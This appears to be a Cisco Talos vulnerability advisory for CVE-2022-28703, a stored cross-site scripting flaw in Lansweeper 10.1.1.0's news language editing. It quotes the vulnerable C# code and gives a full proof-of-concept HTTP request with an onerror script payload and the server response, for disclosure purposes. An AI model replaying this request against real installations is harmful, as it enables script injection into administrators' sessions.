CVE-2022-28703
A stored cross-site scripting vulnerability exists in the HdConfigActions.aspx altertextlanguages functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary Javascript code injection. An attacker can send an HTTP request to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Lansweeper lansweeper 10.1.1.0
lansweeper - https://www.lansweeper.com/
9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
CWE-80 - Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management, compliance and audit purposes.
An exploitable stored xss vulnerability is related with an action: Configuration -> News page->Alter language data choose any language other than english. Vulnerable code is located inside the \LS\CF\HdConfigActions.cs file.
Let us take a close look at the vulnerable source code :
Line 1 int newsID = int.Parse(current.Request["id"]);
Line 2 string reqType = current.Request["type"];
Line 3 (...)
Line 4 case "news":
Line 5 delteSQL = "DELETE FROM htblnewsLang WHERE newsid = @p1";
Line 6 insertSQL = "INSERT htblnewsLang (newsid, [language], description, [text]) VALUES (@p1,@p2,@p3,@p4)";
Line 7 break;
Line 8 (...)
Line 9 DB.ExecuteNonQuery(delteSQL, DB.NewDBParameter("@p1", newsID));
Line 10 foreach (Language langID in Enum.GetValues(typeof(Language)))
Line 11 {
Line 12 if (langID != Language.Eng)
Line 13 {
Line 14 DB.ExecuteNonQuery(insertSQL, DB.NewDBParameter("@p1", newsID), DB.NewDBParameter("@p2", (int)langID), DB.NewDBParameter("@p3", current.Request["lang" + (int)langID] ?? ""), DB.NewDBParameter("@p4", array[(int)(langID - 1)]), DB.NewDBParameter("@p5", (reqType == "news") ? HtmlSanitizer.SanitizeHtml(dictionary2[langID]) : dictionary2[langID]));
Line 15 }
Line 16 }
where part of the request looks like this : REQUEST
POST /configuration/HdConfigActions.aspx?action=altertextlanguages&type=news&id=3 HTTP/1.1
(...)
POST DATA:
lang1=eng_new&lang1x=eng_new_text&lang24=xss_entry&lang24x=<img src=1 onerror=alert(1)>
During the news alter operation, there is a special insert sql query for languages other than english line 12. As you might notice, none of the passed news parameters is sanitized before insertion to the database:
description - lang24=xss_entry
news tesxt - lang24x=<img src=1 onerror=alert(1)>
There is an attempt at sanitization made for paramter 5, but news insert query has just 4 values.
News text does not seem to be sanitize during output either.
Injected code will be automatically triggered each time when a user attempts to edit this news.
REQUEST
POST /configuration/HdConfigActions.aspx?action=altertextlanguages&type=news&id=3 HTTP/1.1
Host: 192.168.0.102:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 837
Origin: http://192.168.0.102:81
Connection: close
Referer: http://192.168.0.102:81/configuration/MainPage/
Cookie: UserSettings=language=24; ASP.NET_SessionId=s3bal3hgmqgscqihm3vxj5gt; custauth=username=hacker&userdomain=; __RequestVerificationToken_Lw__=zP2evPOU4gLNF/pF3R1XPsIP7ceImHsHKoqy7GfYwDnIwHnDJKt3r5 0bFTXNS/XpEAiyEFBVT2ekfSLIPgVMULtvi8Ae4qLSYcUO0UH90vcERUKMi72E3I2yEJexWSyNKlA8gcXlfMPYbc0a94Dji44b2cNn4aS0KGOSUQBn/0=
__VIEWSTATE=&lang1=eng_new&lang1x=eng_new_text&lang24=xss_entry&lang24x=<img src=1 onerror=alert(1)>&lang30=Magic&lang30x=<div style="font:12px Arial,Verdana;font-size:12px;font-family:Arial,Verdana;">Some news text<br style=""></div>&lang34=Magic&lang34x=<div style="font:12px Arial,Verdana;font-size:12px;font-family:Arial,Verdana;">Some news text<br style=""></div>&id=3&type=news&undefined=undefined&chksm=6740673596&__RequestVerificationToken=LCEp+vTDGHE23M5WuFdmjkRUlRS/DSdWiI/M7gs3RxuLXvxiMI9MiWihGndb3j1GaSLAhRww0iwriAEMcPmF4AzPEN50y2dmrSH3dUNVM+n0PtKlrw8vFGFigInLwkFYebmGC/fbz0Lo2lx7Myi0Ce2huzL/7QsGyGsj4We5WVg=
RESPONSE
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
x-frame-options: SAMEORIGIN
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 03 Jun 2022 09:01:34 GMT
Connection: close
Content-Length: 167
{"ErrorType":"","Error":false,"Emsg":"","AddedRows":[["eng_new","",""]],"Columns":[],"Columnwid":[],"Action":"","ReturnValues":{},"ReturnValue":"","ReturnObject":null}
2022-06-27 - Vendor Disclosure
2022-11-29 - Vendor Patch Release
2022-12-01 - Public Release
Discovered by Marcin 'Icewall' Noga of Cisco Talos.